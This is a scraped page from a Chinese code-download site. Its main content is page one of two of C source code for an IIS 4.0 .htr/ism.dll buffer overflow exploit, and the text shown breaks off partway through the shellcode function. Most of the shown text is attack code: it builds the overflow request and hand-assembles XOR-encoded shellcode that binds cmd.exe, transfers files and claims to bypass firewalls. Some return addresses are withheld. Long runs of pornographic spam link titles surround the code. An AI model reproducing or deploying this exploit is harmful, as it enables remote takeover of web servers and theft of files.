亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频

? 歡迎來到蟲蟲下載站! | ?? 資源下載 ?? 資源專輯 ?? 關于我們
? 蟲蟲下載站

?? windows下強大功能的溢出程序源代碼.txt

?? WINDOWS下強大功能的溢出程序源代碼
?? TXT
?? 第 1 頁 / 共 2 頁
字號:
windows下強大功能的溢出程序源代碼

--------------------------------------------------------------------------------

作者:袁哥 yuange@nsfocus.com
主頁:http://www.nsfocus.com

/*----------------------------------------------------------*/
/*   IIS4.0的.htr映射ism.dll溢出攻擊程序                    */
/*   編寫:yuange(yuange@nsfocus.com)                       */
/*   本程序實現所有語言版本WINDOWS下的溢出攻擊。            */
/*   SHELLCODE代碼實現綁定cmd.exe功能,實現上傳、           */
/*   下傳文件的ftp功能,實現加密傳輸功能,不開              */
/*   端口、不開服務,可以繞過防火墻等。獨創的實             */
/*   現源代碼編寫shellcode的辦法,可以方便編寫、            */
/*   修改、調試shellcode,使得編寫強大功能的                */
/*   shellcode成為可能。也解決了溢出攻擊的幾個根            */
/*   本問題:1、溢出點確定;2、shellcode定位;              */
/*   3、jmp esp功能代碼地址確定;4、WINDOWS的API            */
/*   調用地址版本相關問題。另一個版本實現了接管             */
/*   WWW功能,可以實現不修改WEB頁面文件的情況下替           */ 
/*   換所有WEB頁面。                                        */
/*   一般的溢出攻擊程序也可以使用這個框架                   */
/*                                                          */
/*   程序在vc6.0下編譯通過                                  */
/*----------------------------------------------------------*/

/* 
     iis4。0  overflow program ver 1.0
     copy by yuange <yuange@163.net>  2000。05。8
*/   

#include <windows.h> 
#include <winsock.h>
#include <stdio.h>
#include <httpext.h>

#define  FNENDLONG   0x08
#define  NOPCODE     'B'    // INC EDX    0x90
#define  NOPLONG     0x50
#define  BUFFSIZE    0x20000
#define  PATHLONG    0x12
// c:\inetpub\wwwroot    物理路徑長度。
// 因為WWW處理GET /的時候前面要加物理路徑,再傳遞給ISM.DLL處理,所以溢出點與物理路徑有
// 關。可以先用.IDC,.ida,.idq泄露物理路徑的辦法得到物理路徑長度

#define  RETEIPADDRESS 0xxxxx-PATHLONG+4+4
#define  ADD1          0xxxx-0xxxxx-PATHLONG+4
#define  ADD2      0xxxxx-0xxxxx-PATHLONG+4
/* 由于一些原因,這兒數據不提供  2000.10.25 */

// 兩個要處理的參數地址,參見后面ISM.DLL有問題代碼的注釋

#define  SHELLBUFFSIZE 0x800 
#define  SHELLFNNUMS   12
#define  DATAXORCODE   0xAA
#define  LOCKBIGNUM    19999999
#define  LOCKBIGNUM2   13579139
#define  WEBPORT       80  

void     shellcodefnlock();
void     shellcodefn(char *ecb);
void     cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);
void     iisput(int fd,char *str);
void     iisget(int fd,char *str);
int      newrecv(int fd,char *buff,int size,int flag);
int      newsend(int fd,char *buff,int size,int flag);

int      xordatabegin;
int      lockintvar1,lockintvar2;
char     lockcharvar;


int main(int argc, char **argv)
{ 
  char *server;
  char *str="LoadLibraryA""\x0""CreatePipe""\x0"
       "CreateProcessA""\x0""CloseHandle""\x0"
       "PeekNamedPipe""\x0"
       "ReadFile""\x0""WriteFile""\x0"
       "CreateFileA""\x0"
       "GetFileSize""\x0"
       "GetLastError""\x0"
       "Sleep""\x0"
       "cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0"
       "XORDATA""\x0"
       "strend";
  char buff1[]="GET /""\xff""default.htr/";
  char buff2[]=".HTR HTTP/1.1 \nHOST:";
  char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
  char SRLF[]="\x0d\x0a\x00\x00";  

  char eipexcept1[] ="\xxx\xxx\xxx\xxx";
// char eipexcept[] ="\xxx\xxx\xxx\xxx"; 
// ret
  char  eipexcept[]="\xxx\xxx\xxx\xxx"; 
  char  eipwinnt[] ="\xxx\xxx\xxx\xxx";
  char  eipwinnt2[]="\xxx\xxx\xxx\xxx";
  char  reteax[]   ="\xxx\xxx\xxx\xxx";

/* 由于一些原因,這兒數據不提供  2000.10.25 */

  char  eipjmpshell[]="\x90\x90\x90\x90\xff\x63\x64";
  

  char    buff[BUFFSIZE];
  char    recvbuff[BUFFSIZE];
  char    shellcodebuff[0x1000];
  struct  sockaddr_in s_in2,s_in3;
  struct  hostent *he;
  char    *shellcodefnadd,*chkespadd;
  unsigned  int sendpacketlong;

  int       i,j,k;
  unsigned  char temp;
  int       fd;
  u_short   port,port1,shellcodeport;
  SOCKET    d_ip;
  WSADATA   wsaData;
  int       offset=0;
  int       OVERADD=RETEIPADDRESS;
  int       result;

  fprintf(stderr,"\n IIS4.0 OVERFLOW PROGRAM 2.0 .");
  fprintf(stderr,"\n copy by yuange(yuange@nsfocus.com) 2000.6.2.");
  fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net .");
  fprintf(stderr,"\n welcome to http://www.nsfocus.com .");
  fprintf(stderr,"\n usage: %s <server> [offset] [webport] \n", argv[0]);

  if(argc <2){
      fprintf(stderr,"\n please enter the web server:");
      gets(recvbuff);
      for(i=0;i<strlen(recvbuff);++i){
         if(recvbuff[i]!=' ') break;
      }

      server=recvbuff;
      if(i<strlen(recvbuff)) server+=i;

      fprintf(stderr,"\n please enter the offset(0-3):");
      gets(buff);
      for(i=0;i<strlen(buff);++i){
      if(buff[i]!=' ') break;
      }
      offset=atoi(buff+i);       
  }


  result= WSAStartup(MAKEWORD(1, 1), &wsaData);
  if (result != 0) {
        fprintf(stderr, "Your computer was not connected "
        "to the Internet at the time that "
        "this program was launched, or you "
        "do not have a 32-bit "
        "connection to the Internet.");
        exit(1);
  }

  if(argc>2){
     offset=atoi(argv[2]);
  }
  OVERADD+=offset;

/*
  if(offset<0||offset>3){
     fprintf(stderr,"\n offset error !offset  0 - 3 .");
     gets(buff);
     exit(1);
  }

*/


  if(argc <2){
  //     WSACleanup( );    
  //       exit(1);
  }
  else  server = argv[1];

  for(i=0;i<strlen(server);++i){
     if(server[i]!=' ')
     break;
  }
  if(i<strlen(server)) server+=i;

  for(i=0;i+3<strlen(server);++i){
      if(server[i]==':'){
          if(server[i+1]=='\\'||server[i+1]=='/'){
              if(server[i+2]=='\\'||server[i+2]=='/'){
              server+=i;
              server+=3;
                  break;
              }
          }
      }
  }
  for(i=1;i<=strlen(server);++i){
      if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0;
  }

  d_ip = inet_addr(server);
  if(d_ip==-1){
     he = gethostbyname(server);
     if(!he)
     {
           WSACleanup( );
       printf("\n Can't get the ip of %s !\n",server);
       gets(buff);
           exit(1);     
      }
      else    memcpy(&d_ip, he->h_addr, 4);
  }     
  
  if(argc>3) port=atoi(argv[3]);
  else   port=WEBPORT;
  if(port==0) port=WEBPORT;

  fd = socket(AF_INET, SOCK_STREAM,0);
  i=8000;
  setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));
         
  s_in3.sin_family = AF_INET;
  s_in3.sin_port = htons(port);
  s_in3.sin_addr.s_addr = d_ip;
  printf("\n nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));
  
  if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0)  {        
     closesocket(fd);
     WSACleanup( );
     fprintf(stderr,"\n  connect err.");
     gets(buff);
     exit(1);
}
  
  _asm{
     mov ESI,ESP
     cmp ESI,ESP
  }
  _chkesp();
  chkespadd=_chkesp;
  temp=*chkespadd;
  if(temp==0xe9) {
         ++chkespadd;
            i=*(int*)chkespadd;
         chkespadd+=i;
         chkespadd+=4;
  }

  shellcodefnadd=shellcodefnlock;
  temp=*shellcodefnadd;
  if(temp==0xe9) {
         ++shellcodefnadd;
         k=*(int *)shellcodefnadd;
             shellcodefnadd+=k;
         shellcodefnadd+=4;
  }

  for(k=0;k<=0x500;++k){
         if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
  }
  memset(buff,NOPCODE,BUFFSIZE);
  if(argc>4){
    memcpy(buff,argv[4],strlen(argv[4]));
  }
  else  memcpy(buff,buff1,strlen(buff1));
  
  memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80);
     
  shellcodefnadd=shellcodefn;
  temp=*shellcodefnadd;
  if(temp==0xe9) {
     ++shellcodefnadd;
     k=*(int *)shellcodefnadd;
         shellcodefnadd+=k;
     shellcodefnadd+=4;
  }
  

  for(k=0;k<=0x1000;++k){
     if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
  }

  memcpy(shellcodebuff,shellcodefnadd,k); 
  cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
  for(i=0;i<0x400;++i){ 
          if(memcmp(str+i,"strend",6)==0) break;
  }     
  memcpy(shellcodebuff+k,str,i);


  sendpacketlong=k+i;
  for(k=0;k<=0x200;++k){
     if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break;
  }

  
  
  for(i=0;i<sendpacketlong;++i){
     temp=shellcodebuff[i];
     temp^=DATAXORCODE;
     if(temp<=0x10||temp==' '||temp=='.'||temp=='/'||temp=='\\'||temp=='0'||temp=='?'||temp=='%'){
             buff[OVERADD+NOPLONG+k]='0';
         ++k;
        temp+=0x40;
     }
     buff[OVERADD+NOPLONG+k]=temp;
     ++k;
}


//  memcpy(buff+OVERADD+NOPLONG+k,shellcodebuff,sendpacketlong);
//  k+=sendpacketlong;


   for(i=-0x30;i<0x30;i+=4){
        memcpy(buff+ADD1+offset+i,eipexcept,4);
        memcpy(buff+ADD2+offset+i,eipexcept,4);
   }

   for(i=-0x30;i<0x30;i+=4){
        memcpy(buff+OVERADD+i,eipexcept,4);
   }
   memcpy(buff+OVERADD+i,eipwinnt2,4);
   memcpy(buff+OVERADD+i+4,reteax,4);
   memcpy(buff+OVERADD+i+8,eipwinnt,4);
   memcpy(buff+OVERADD+i+0x0c,eipwinnt,4);
   memcpy(buff+OVERADD+i+0x10,eipjmpshell,7);

// fprintf(stderr,"\n send:\n %s",buff);
   fprintf(stderr,"\n offset:%d",offset);
/*

  if(argc>2){
      server=argv[2];
      if(strcmp(server,"win9x")==0){
          memcpy(buff+OVERADD,eipwin9x,4);
          fprintf(stderr,"\n nuke win9x.");
      }
      if(strcmp(server,"winnt")==0){
          memcpy(buff+OVERADD,eipwinnt,4);
          fprintf(stderr,"\n nuke winnt.");
      }
      
  }

*/

sendpacketlong=k+OVERADD+NOPLONG;
strcpy(buff+sendpacketlong,buff2);
strcpy(buff+sendpacketlong+strlen(buff2),server);
strcpy(buff+sendpacketlong+strlen(buff2)+strlen(server),"\n\n");
// printf("\n send buff:\n%s",buff);
//  strcpy(buff+OVERADD+NOPLONG,shellcode);
  sendpacketlong=strlen(buff);

/*
#ifdef DEBUG
  _asm{
      lea esp,buff
        add esp,OVERADD
      ret

  }
#endif

*/
  if(argc>6){
    if(strcmp(argv[6],"debug")==0){
           _asm{
             lea esp,buff
             add esp,OVERADD
             ret
        }
        }
  }



  xordatabegin=0;
  for(i=0;i<1;++i){ 
     j=sendpacketlong;
     fprintf(stderr,"\n send  packet %d bytes.",j);
         send(fd,buff,j,0);
     k=newrecv(fd,recvbuff,0x1000,0);
         if(k>=8&&memcmp(recvbuff,"XORDATA",8)==0) {
          xordatabegin=1;
              k=-1;
          fprintf(stderr,"\n ok!\n");
     }
     if(k>0){
          recvbuff[k]=0;
            fprintf(stderr,"\n  recv:\n %s",recvbuff);
     }

  }

  k=1;
  ioctlsocket(fd, FIONBIO, &k);

// fprintf(stderr,"\n now begin: \n");

  lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
  lockintvar2=lockintvar1;

  k=1;
  while(k!=0){
      if(k<0){
          i=0;
      while(i==0){
          gets(buff);
              if(memcmp(buff,"iisput",6)==0){
                  iisput(fd,buff+6);
              }
              else{
                  if(memcmp(buff,"iisget",6)==0){
                      iisget(fd,buff+6);
          }
          else i=1;
        }
         }
         k=strlen(buff);    
         memcpy(buff+k,SRLF,3);
         newsend(fd,buff,k+2,0);

     }
     k=newrecv(fd,buff,0x1000,0);
     if(xordatabegin==0&&k>=8&&memcmp(buff,"XORDATA",8)==0){
       xordatabegin=1;
           k=-1;
     }

     if(k>0){
      buff[k]=0;
      fprintf(stderr,"%s",buff);
     }
//   if(k==0) break;
  }  
  closesocket(fd);
  WSACleanup( );
  fprintf(stderr,"\n the server close connect.");
  gets(buff);
  return(0);
}


void  shellcodefnlock()
{
       _asm{
              nop
              nop
              nop
              nop
          nop
          nop
          nop
          nop

          _emit('?')
              
          xor ecx,ecx
          add si,474h
          cmp dword ptr [esi],ecx
          jnz getesi
          add si,4
getesi:          mov esi,[esi]
          add si,8
          xor ecx,ecx
          mov byte ptr [esi],cl


                  jmp   next
getediadd:      pop   EDI
          push  EDI
          pop   ESI
          push  ebx   //  ecb
          push  ebx   //  call shellcodefn ret address
          xor   ecx,ecx
looplock:         lodsb
          cmp  al,cl
          jz   shell
          cmp  al,0x30
          jz   clean0
sto:              xor  al,DATAXORCODE
          stosb
          jmp  looplock
clean0:           lodsb
          sub al,0x40
          jmp sto
next:             call  getediadd
shell:           NOP
          NOP
          NOP
          NOP
          NOP
          NOP
          NOP
          NOP
              
    }
}         

void shellcodefn(char *ecb)
{
    char        Buff[SHELLBUFFSIZE+2];
    int         *except[3];

    FARPROC     Sleepadd;
    FARPROC     GetLastErroradd;
    FARPROC     GetFileSizeadd;    
    FARPROC     CreateFileAadd;
    FARPROC     WriteFileadd;

?? 快捷鍵說明

復制代碼 Ctrl + C
搜索代碼 Ctrl + F
全屏模式 F11
切換主題 Ctrl + Shift + D
顯示快捷鍵 ?
增大字號 Ctrl + =
減小字號 Ctrl + -
亚洲欧美第一页_禁久久精品乱码_粉嫩av一区二区三区免费野_久草精品视频
欧美日韩视频第一区| 国产传媒日韩欧美成人| 亚洲日本在线视频观看| 国产日韩av一区二区| 国产片一区二区| 亚洲国产经典视频| 国产精品视频观看| 亚洲视频在线一区| 亚洲综合免费观看高清完整版| 亚洲欧美日韩国产另类专区| 一区二区三区久久久| 午夜电影久久久| 久久精品国产第一区二区三区| 久久成人精品无人区| 国产精品一区在线观看乱码| 成年人网站91| 在线视频国产一区| 欧美www视频| 国产精品国产精品国产专区不蜜 | 97精品久久久午夜一区二区三区| 粉嫩嫩av羞羞动漫久久久| 91网站最新地址| 欧美一区中文字幕| 精品国产一区二区三区忘忧草| 欧美va亚洲va在线观看蝴蝶网| 日本一区二区三区四区在线视频| 又紧又大又爽精品一区二区| 日本亚洲视频在线| 国产91精品精华液一区二区三区 | 婷婷综合五月天| 国产福利一区二区三区视频在线 | 欧美高清视频一二三区 | 日韩写真欧美这视频| 久久久久久久免费视频了| 亚洲啪啪综合av一区二区三区| 日本麻豆一区二区三区视频| 成人av在线一区二区三区| 777午夜精品免费视频| 国产精品午夜春色av| 日本不卡123| 欧美中文字幕一区二区三区亚洲| 日韩精品一区二区三区蜜臀| 国产精品灌醉下药二区| 精品亚洲aⅴ乱码一区二区三区| av高清久久久| 久久精品日产第一区二区三区高清版 | 男男gaygay亚洲| 99精品欧美一区二区三区小说| 欧美一卡二卡在线观看| 亚洲你懂的在线视频| 韩国午夜理伦三级不卡影院| 欧美视频在线播放| 亚洲欧美日韩综合aⅴ视频| 国产综合久久久久久鬼色| 色琪琪一区二区三区亚洲区| 久久精品免费在线观看| 久久99精品久久久久久国产越南 | 国产精品美女久久久久久| 日本在线播放一区二区三区| 99久久婷婷国产综合精品 | 欧美伊人久久大香线蕉综合69| 国产欧美精品一区| 精品一区二区国语对白| 91麻豆精品91久久久久久清纯 | 日韩欧美一二区| 午夜视频一区二区| 91久久精品国产91性色tv| 国产精品系列在线| 成人av网站在线观看免费| 久久久一区二区| 国产高清在线观看免费不卡| 久久综合久久99| 国产精品1024久久| 久久久国产午夜精品| 日本午夜一本久久久综合| 在线电影国产精品| 全国精品久久少妇| 精品久久免费看| 国产sm精品调教视频网站| 国产欧美精品国产国产专区 | 日本美女一区二区三区| 日韩免费观看2025年上映的电影| 久久99久久99精品免视看婷婷| 精品国产区一区| 成人av资源下载| 亚洲一区二区三区四区的| 在线观看91av| 国产精品亚洲第一区在线暖暖韩国| 国产嫩草影院久久久久| 国产剧情一区二区| 亚洲精品老司机| 欧美一级一区二区| 国产激情偷乱视频一区二区三区| 国产精品乱子久久久久| 欧美最猛黑人xxxxx猛交| 日韩二区三区在线观看| 久久亚洲精品国产精品紫薇| 不卡一区二区三区四区| 亚洲国产精品视频| 26uuu亚洲| 色乱码一区二区三区88| 蜜臀国产一区二区三区在线播放| www亚洲一区| 一本大道av伊人久久综合| 日本成人在线一区| 国产精品久久久久久妇女6080| 欧美亚洲综合久久| 国产一区二区三区在线观看免费视频 | 欧美调教femdomvk| 国内精品伊人久久久久影院对白| 国产精品久久久久久久浪潮网站 | 精品国产在天天线2019| 波多野结衣在线一区| 日韩精品色哟哟| 18欧美乱大交hd1984| 日韩一区二区在线观看| aaa欧美大片| 国产一区二区三区日韩| 亚洲成人免费在线| 国产精品女主播在线观看| 91精品国产91久久久久久一区二区| 成人久久视频在线观看| 亚洲不卡一区二区三区| 国产精品美女久久久久久2018| 欧美一级欧美三级在线观看| 色综合激情久久| 成人黄色电影在线| 国产在线播放一区| 蜜桃精品视频在线| 天堂在线一区二区| 亚洲一卡二卡三卡四卡无卡久久| 亚洲乱码中文字幕| 国产亚洲精品中文字幕| 欧美一级日韩免费不卡| 日本高清免费不卡视频| 成人av资源网站| 粉嫩高潮美女一区二区三区| 精东粉嫩av免费一区二区三区| 亚洲成人中文在线| 亚洲图片欧美色图| 一区二区三区免费网站| 亚洲图片欧美激情| 国产精品久线在线观看| 中文字幕第一区第二区| 国产欧美一区在线| 亚洲国产精品黑人久久久| 久久久久久9999| 久久久久久久久久久久久夜| 久久久久久**毛片大全| 国产亚洲欧美一级| 中文在线一区二区| 国产亚洲一二三区| 国产欧美综合色| 日韩一区在线播放| 亚洲精品国产第一综合99久久 | 亚洲码国产岛国毛片在线| 国产精品国产三级国产aⅴ原创 | 成人污污视频在线观看| 国产ts人妖一区二区| 国产白丝精品91爽爽久久| 成人网在线播放| 91麻豆精品秘密| 欧美性猛交xxxx黑人交| 欧美一区二区三区婷婷月色| 日韩欧美国产系列| 中文字幕精品一区二区精品绿巨人| 中文字幕亚洲电影| 亚洲精品日韩一| 蜜臀av性久久久久蜜臀aⅴ四虎| 久久国产精品99精品国产| 国产乱淫av一区二区三区| 成人午夜视频免费看| 99视频国产精品| 欧美伦理影视网| www日韩大片| 亚洲欧美日韩成人高清在线一区| 五月婷婷综合激情| 国产乱对白刺激视频不卡| www..com久久爱| 欧美一区二区在线不卡| 国产目拍亚洲精品99久久精品| 艳妇臀荡乳欲伦亚洲一区| 日韩 欧美一区二区三区| 国产黄色成人av| 欧美日韩成人在线| 国产精品午夜免费| 午夜电影网一区| 成人黄页在线观看| 日韩亚洲国产中文字幕欧美| 国产精品欧美一区二区三区| 亚洲成人黄色小说| 成人综合婷婷国产精品久久蜜臀| 欧美日韩视频在线一区二区| 久久久国际精品| 青青草97国产精品免费观看 | 中文字幕欧美一| 琪琪一区二区三区| 在线国产亚洲欧美| 国产片一区二区三区| 青青草国产精品亚洲专区无|